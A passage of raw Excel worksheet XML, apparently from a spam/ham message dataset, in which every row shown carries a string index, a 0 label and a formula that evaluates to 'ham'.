      <c r="A2408" t="s">
        <v>1876</v>
      </c>
      <c r="B2408">
        <v>0</v>
      </c>
      <c r="C2408" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2409" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2409" t="s">
        <v>1877</v>
      </c>
      <c r="B2409">
        <v>0</v>
      </c>
      <c r="C2409" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2410" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2410" t="s">
        <v>1878</v>
      </c>
      <c r="B2410">
        <v>0</v>
      </c>
      <c r="C2410" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2411" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2411" t="s">
        <v>1879</v>
      </c>
      <c r="B2411">
        <v>0</v>
      </c>
      <c r="C2411" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2412" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2412" t="s">
        <v>1880</v>
      </c>
      <c r="B2412">
        <v>0</v>
      </c>
      <c r="C2412" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2413" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2413" t="s">
        <v>1881</v>
      </c>
      <c r="B2413">
        <v>0</v>
      </c>
      <c r="C2413" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2414" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2414" t="s">
        <v>1882</v>
      </c>
      <c r="B2414">
        <v>0</v>
      </c>
      <c r="C2414" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2415" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2415" t="s">
        <v>1883</v>
      </c>
      <c r="B2415">
        <v>0</v>
      </c>
      <c r="C2415" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2416" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2416" t="s">
        <v>1884</v>
      </c>
      <c r="B2416">
        <v>0</v>
      </c>
      <c r="C2416" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2417" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2417" t="s">
        <v>1885</v>
      </c>
      <c r="B2417">
        <v>0</v>
      </c>
      <c r="C2417" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2418" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2418" t="s">
        <v>1886</v>
      </c>
      <c r="B2418">
        <v>0</v>
      </c>
      <c r="C2418" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2419" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2419" t="s">
        <v>1887</v>
      </c>
      <c r="B2419">
        <v>0</v>
      </c>
      <c r="C2419" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2420" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2420" t="s">
        <v>1888</v>
      </c>
      <c r="B2420">
        <v>0</v>
      </c>
      <c r="C2420" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2421" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2421" t="s">
        <v>1889</v>
      </c>
      <c r="B2421">
        <v>0</v>
      </c>
      <c r="C2421" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2422" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2422" t="s">
        <v>1890</v>
      </c>
      <c r="B2422">
        <v>0</v>
      </c>
      <c r="C2422" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2423" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2423" t="s">
        <v>1891</v>
      </c>
      <c r="B2423">
        <v>0</v>
      </c>
      <c r="C2423" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2424" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2424" t="s">
        <v>1892</v>
      </c>
      <c r="B2424">
        <v>0</v>
      </c>
      <c r="C2424" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2425" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2425" t="s">
        <v>1893</v>
      </c>
      <c r="B2425">
        <v>0</v>
      </c>
      <c r="C2425" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2426" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2426" t="s">
        <v>1894</v>
      </c>
      <c r="B2426">
        <v>0</v>
      </c>
      <c r="C2426" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2427" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2427" t="s">
        <v>1895</v>
      </c>
      <c r="B2427">
        <v>0</v>
      </c>
      <c r="C2427" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2428" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2428" t="s">
        <v>1896</v>
      </c>
      <c r="B2428">
        <v>0</v>
      </c>
      <c r="C2428" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2429" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2429" t="s">
        <v>1897</v>
      </c>
      <c r="B2429">
        <v>0</v>
      </c>
      <c r="C2429" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2430" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2430" t="s">
        <v>1898</v>
      </c>
      <c r="B2430">
        <v>0</v>
      </c>
      <c r="C2430" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2431" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2431" t="s">
        <v>1899</v>
      </c>
      <c r="B2431">
        <v>0</v>
      </c>
      <c r="C2431" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2432" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2432" t="s">
        <v>1900</v>
      </c>
      <c r="B2432">
        <v>0</v>
      </c>
      <c r="C2432" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2433" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2433" t="s">
        <v>1901</v>
      </c>
      <c r="B2433">
        <v>0</v>
      </c>
      <c r="C2433" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2434" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2434" t="s">
        <v>1902</v>
      </c>
      <c r="B2434">
        <v>0</v>
      </c>
      <c r="C2434" t="str">
        <f t="shared" ref="C2434:C2497" si="38">IF(B2434="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2435" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2435" t="s">
        <v>1903</v>
      </c>
      <c r="B2435">
        <v>0</v>
      </c>
      <c r="C2435" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2436" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2436" t="s">
        <v>1904</v>
      </c>
      <c r="B2436">
        <v>0</v>
      </c>
      <c r="C2436" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2437" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2437" t="s">
        <v>1905</v>
      </c>
      <c r="B2437">
        <v>0</v>
      </c>
      <c r="C2437" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2438" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2438" t="s">
        <v>1906</v>
      </c>
      <c r="B2438">
        <v>0</v>
      </c>
      <c r="C2438" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2439" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2439" t="s">
        <v>1907</v>
      </c>
      <c r="B2439">
        <v>0</v>
      </c>
      <c r="C2439" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2440" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2440" t="s">
        <v>1908</v>
      </c>
      <c r="B2440">
        <v>0</v>
      </c>
      <c r="C2440" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2441" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2441" t="s">
        <v>1909</v>
      </c>
      <c r="B2441">
        <v>0</v>
      </c>
      <c r="C2441" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2442" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2442" t="s">
        <v>1910</v>
      </c>
      <c r="B2442">
        <v>0</v>
      </c>
      <c r="C2442" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2443" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2443" t="s">
        <v>1911</v>
      </c>
      <c r="B2443">
        <v>0</v>
      </c>
      <c r="C2443" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2444" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2444" t="s">
        <v>1912</v>
      </c>
      <c r="B2444">
        <v>0</v>
      </c>
      <c r="C2444" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2445" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2445" t="s">
        <v>1913</v>
      </c>
      <c r="B2445">
        <v>0</v>
      </c>
      <c r="C2445" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2446" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2446" t="s">
        <v>1914</v>
      </c>
      <c r="B2446">
        <v>0</v>
      </c>
      <c r="C2446" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2447" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2447" t="s">
        <v>1915</v>
      </c>
      <c r="B2447">
        <v>0</v>
      </c>
      <c r="C2447" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2448" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2448" t="s">
        <v>1916</v>
      </c>
      <c r="B2448">
        <v>0</v>
      </c>
      <c r="C2448" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2449" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2449" t="s">
        <v>1917</v>
      </c>
      <c r="B2449">
        <v>0</v>
      </c>
      <c r="C2449" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2450" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2450" t="s">
        <v>1918</v>
      </c>
      <c r="B2450">
        <v>0</v>
      </c>
      <c r="C2450" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2451" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2451" t="s">
        <v>1919</v>
      </c>
      <c r="B2451">
        <v>0</v>
      </c>
      <c r="C2451" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2452" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2452" t="s">
        <v>1920</v>
      </c>
      <c r="B2452">
        <v>0</v>
      </c>
      <c r="C2452" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2453" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2453" t="s">
        <v>1921</v>
      </c>
      <c r="B2453">
        <v>0</v>
      </c>
      <c r="C2453" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2454" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2454" t="s">
        <v>1922</v>
      </c>
      <c r="B2454">
        <v>0</v>
      </c>
      <c r="C2454" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2455" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2455" t="s">
        <v>1923</v>
      </c>
      <c r="B2455">
        <v>0</v>
      </c>
      <c r="C2455" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2456" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2456" t="s">
        <v>1924</v>
      </c>
      <c r="B2456">
        <v>0</v>
      </c>
      <c r="C2456" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2457" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2457" t="s">
        <v>1925</v>
      </c>
      <c r="B2457">
        <v>0</v>
      </c>
      <c r="C2457" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2458" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2458" t="s">
        <v>1926</v>
      </c>
      <c r="B2458">
        <v>0</v>
      </c>
      <c r="C2458" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2459" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2459" t="s">
        <v>1927</v>
      </c>
      <c r="B2459">
        <v>0</v>
      </c>
      <c r="C2459" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2460" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2460" t="s">
        <v>1928</v>
      </c>
      <c r="B2460">
        <v>0</v>
      </c>
      <c r="C2460" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2461" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2461" t="s">
        <v>1929</v>
      </c>
      <c r="B2461">
        <v>0</v>
      </c>
      <c r="C2461" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2462" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2462" t="s">
        <v>1930</v>
      </c>
      <c r="B2462">
        <v>0</v>
      </c>
      <c r="C2462" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2463" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2463" t="s">
        <v>1931</v>
      </c>
      <c r="B2463">
        <v>0</v>
      </c>
      <c r="C2463" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2464" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2464" t="s">
        <v>1932</v>
      </c>
      <c r="B2464">
        <v>0</v>
      </c>
      <c r="C2464" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2465" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2465" t="s">
        <v>1933</v>
      </c>
      <c r="B2465">
        <v>0</v>
      </c>
      <c r="C2465" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2466" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2466" t="s">
        <v>1934</v>
      </c>
      <c r="B2466">
        <v>0</v>
      </c>
      <c r="C2466" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2467" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2467" t="s">
        <v>1935</v>
      </c>
      <c r="B2467">
        <v>0</v>
      </c>
      <c r="C2467" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2468" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2468" t="s">
        <v>1936</v>
      </c>
      <c r="B2468">
        <v>0</v>
      </c>
      <c r="C2468" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2469" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2469" t="s">
        <v>1937</v>
      </c>
      <c r="B2469">
        <v>0</v>
      </c>
      <c r="C2469" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2470" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2470" t="s">
        <v>1938</v>
      </c>
      <c r="B2470">
        <v>0</v>
      </c>
      <c r="C2470" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2471" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2471" t="s">
        <v>1939</v>
      </c>
      <c r="B2471">
        <v>0</v>
      </c>
      <c r="C2471" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2472" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2472" t="s">
        <v>1940</v>
      </c>
      <c r="B2472">
        <v>0</v>
      </c>
      <c r="C2472" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2473" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2473" t="s">
        <v>1941</v>
      </c>
      <c r="B2473">
        <v>0</v>
      </c>
      <c r="C2473" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2474" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2474" t="s">
        <v>1942</v>
      </c>
      <c r="B2474">
        <v>0</v>
      </c>
      <c r="C2474" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2475" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2475" t="s">
        <v>21</v>
      </c>
      <c r="B2475">
        <v>0</v>
      </c>
      <c r="C2475" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2476" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2476" t="s">
        <v>1943</v>
      </c>
      <c r="B2476">
        <v>0</v>
      </c>
      <c r="C2476" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2477" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2477" t="s">
        <v>1944</v>
      </c>
      <c r="B2477">
        <v>0</v>
      </c>
      <c r="C2477" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2478" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2478" t="s">
        <v>1945</v>
      </c>
      <c r="B2478">
        <v>0</v>
      </c>
      <c r="C2478" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2479" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2479" t="s">
        <v>1946</v>
      </c>
      <c r="B2479">
        <v>0</v>
      </c>
      <c r="C2479" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2480" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2480" t="s">
        <v>1947</v>
      </c>
      <c r="B2480">
        <v>0</v>
      </c>
      <c r="C2480" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2481" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2481" t="s">
        <v>1948</v>
      </c>
      <c r="B2481">
        <v>0</v>
      </c>
      <c r="C2481" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2482" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2482" t="s">
        <v>1949</v>
      </c>
      <c r="B2482">
        <v>0</v>
      </c>
      <c r="C2482" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2483" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2483" t="s">
        <v>1950</v>
      </c>
      <c r="B2483">
        <v>0</v>
      </c>
      <c r="C2483" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2484" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2484" t="s">
        <v>1951</v>
      </c>
      <c r="B2484">
        <v>0</v>
      </c>
      <c r="C2484" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2485" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2485" t="s">
        <v>1952</v>
      </c>
      <c r="B2485">
        <v>0</v>
      </c>
      <c r="C2485" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2486" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2486" t="s">
        <v>1953</v>
      </c>
      <c r="B2486">
        <v>0</v>
      </c>
      <c r="C2486" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2487" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2487" t="s">
        <v>1954</v>
      </c>
      <c r="B2487">
        <v>0</v>
      </c>
      <c r="C2487" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2488" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2488" t="s">
        <v>1955</v>
      </c>
      <c r="B2488">
        <v>0</v>
      </c>
      <c r="C2488" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2489" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2489" t="s">
        <v>1956</v>
      </c>
      <c r="B2489">
        <v>0</v>
      </c>
      <c r="C2489" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2490" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2490" t="s">
        <v>1957</v>
      </c>
      <c r="B2490">
        <v>0</v>
      </c>
      <c r="C2490" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2491" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2491" t="s">
        <v>1958</v>
      </c>
      <c r="B2491">
        <v>0</v>
      </c>
      <c r="C2491" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2492" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2492" t="s">
        <v>1959</v>
      </c>
      <c r="B2492">
        <v>0</v>
      </c>
      <c r="C2492" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2493" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2493" t="s">
        <v>1960</v>
      </c>
      <c r="B2493">
        <v>0</v>
      </c>
      <c r="C2493" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2494" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2494" t="s">
        <v>1961</v>
      </c>
      <c r="B2494">
        <v>0</v>
      </c>
      <c r="C2494" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2495" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2495" t="s">
        <v>1962</v>
      </c>
      <c r="B2495">
        <v>0</v>
      </c>
      <c r="C2495" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2496" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2496" t="s">
        <v>1963</v>
      </c>
      <c r="B2496">
        <v>0</v>
      </c>
      <c r="C2496" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2497" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2497" t="s">
        <v>1964</v>
      </c>
      <c r="B2497">
        <v>0</v>
      </c>
      <c r="C2497" t="str">
        <f t="shared" si="38"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2498" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2498" t="s">
        <v>1965</v>
      </c>
      <c r="B2498">
        <v>0</v>
      </c>
      <c r="C2498" t="str">
        <f t="shared" ref="C2498:C2561" si="39">IF(B2498="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2499" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2499" t="s">
        <v>1966</v>
      </c>
      <c r="B2499">
        <v>0</v>
      </c>
      <c r="C2499" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2500" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2500" t="s">
        <v>1967</v>
      </c>
      <c r="B2500">
        <v>0</v>
      </c>
      <c r="C2500" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2501" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2501" t="s">
        <v>1968</v>
      </c>
      <c r="B2501">
        <v>0</v>
      </c>
      <c r="C2501" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2502" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2502" t="s">
        <v>1969</v>
      </c>
      <c r="B2502">
        <v>0</v>
      </c>
      <c r="C2502" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2503" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2503" t="s">
        <v>1970</v>
      </c>
      <c r="B2503">
        <v>0</v>
      </c>
      <c r="C2503" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2504" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2504" t="s">
        <v>1971</v>
      </c>
      <c r="B2504">
        <v>0</v>
      </c>
      <c r="C2504" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2505" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2505" t="s">
        <v>1972</v>
      </c>
      <c r="B2505">
        <v>0</v>
      </c>
      <c r="C2505" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2506" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2506" t="s">
        <v>1973</v>
      </c>
      <c r="B2506">
        <v>0</v>
      </c>
      <c r="C2506" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2507" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2507" t="s">
        <v>1974</v>
      </c>
      <c r="B2507">
        <v>0</v>
      </c>
      <c r="C2507" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2508" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2508" t="s">
        <v>1975</v>
      </c>
      <c r="B2508">
        <v>0</v>
      </c>
      <c r="C2508" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2509" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2509" t="s">
        <v>1976</v>
      </c>
      <c r="B2509">
        <v>0</v>
      </c>
      <c r="C2509" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2510" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2510" t="s">
        <v>1977</v>
      </c>
      <c r="B2510">
        <v>0</v>
      </c>
      <c r="C2510" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2511" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2511" t="s">
        <v>1978</v>
      </c>
      <c r="B2511">
        <v>0</v>
      </c>
      <c r="C2511" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2512" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2512" t="s">
        <v>1979</v>
      </c>
      <c r="B2512">
        <v>0</v>
      </c>
      <c r="C2512" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2513" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2513" t="s">
        <v>1980</v>
      </c>
      <c r="B2513">
        <v>0</v>
      </c>
      <c r="C2513" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2514" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2514" t="s">
        <v>1981</v>
      </c>
      <c r="B2514">
        <v>0</v>
      </c>
      <c r="C2514" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2515" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2515" t="s">
        <v>1982</v>
      </c>
      <c r="B2515">
        <v>0</v>
      </c>
      <c r="C2515" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2516" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2516" t="s">
        <v>1983</v>
      </c>
      <c r="B2516">
        <v>0</v>
      </c>
      <c r="C2516" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2517" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2517" t="s">
        <v>1984</v>
      </c>
      <c r="B2517">
        <v>0</v>
      </c>
      <c r="C2517" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2518" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2518" t="s">
        <v>1985</v>
      </c>
      <c r="B2518">
        <v>0</v>
      </c>
      <c r="C2518" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2519" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2519" t="s">
        <v>1986</v>
      </c>
      <c r="B2519">
        <v>0</v>
      </c>
      <c r="C2519" t="str">
        <f t="shared" si="39"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2520" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2520" t="s">
        <v>1987</v>
      </c>
      <c r="B2520">
